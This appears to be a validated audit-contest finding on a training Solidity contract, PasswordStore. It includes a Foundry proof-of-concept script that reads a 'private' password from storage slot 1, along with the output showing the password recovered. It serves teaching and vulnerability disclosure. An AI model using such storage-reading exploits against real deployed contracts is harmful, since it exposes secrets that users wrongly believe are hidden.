First Flight #1: PasswordStore
First Flight #1
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Business Logic - Private variable does not keep value hidden from view

equious

Summary

Despite being private the s_password variable is still publicly viewable and saved in plain text making the protocol a very poor choice to securely store passwords.

Vulnerability Details

By calling load() on the contract's storage slot for s_password, anyone is able to view the stored value.

contract DeployPasswordStore is Script {
function run() public returns (PasswordStore) {
vm.startBroadcast();
PasswordStore passwordStore = new PasswordStore();
passwordStore.setPassword("myPassword");
bytes32 foundYourPass = vm.load(address(passwordStore), bytes32(uint256(1)));
string memory stringPassword = string(abi.encodePacked(foundYourPass));
console2.log(stringPassword);
vm.stopBroadcast();
return passwordStore;
}
}

Results in:

Compiler run successful!
Script ran successfully.
== Return ==
0: contract PasswordStore 0x34A1D3fff3958843C43aD80F30b94c510645C316
== Logs ==
myPassword

Impact

Anyone can access the password value at any time, compromising whatever the password was meant to protect.

Tools Used

Manual Review
Foundry

Recommendations

Require the setPassword and getPassword functions to require a shared input param in order to encrypt/decrypt the stored password value.

Updates

Lead Judging Commences

inallhonesty Lead Judge
almost 2 years ago
inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.